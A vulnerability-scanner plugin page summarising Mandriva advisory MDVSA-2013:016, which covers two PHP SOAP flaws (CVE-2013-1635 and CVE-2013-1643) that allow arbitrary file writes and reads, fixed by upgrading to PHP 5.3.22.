Mandriva Linux Security Advisory : php (MDVSA-2013:016)
High Nessus Plugin ID 64942
SynopsisThe remote Mandriva Linux host is missing one or more security updates.
DescriptionMultiple vulnerabilities has been discovered and corrected in php :
PHP does not validate the configration directive soap.wsdl_cache_dir before writing SOAP wsdl cache files to the filesystem. Thus an attacker is able to write remote wsdl files to arbitrary locations (CVE-2013-1635).
PHP allows the use of external entities while parsing SOAP wsdl files which allows an attacker to read arbitrary files. If a web application unserializes user-supplied data and tries to execute any method of it, an attacker can send serialized SoapClient object initialized in non-wsdl mode which will make PHP to parse automatically remote XML-document specified in the location option parameter (CVE-2013-1643).
The updated packages have been upgraded to the 5.3.22 version which is not vulnerable to these issues.
Additionally, some packages which requires so has been rebuilt for php-5.3.22.
SolutionUpdate the affected packages.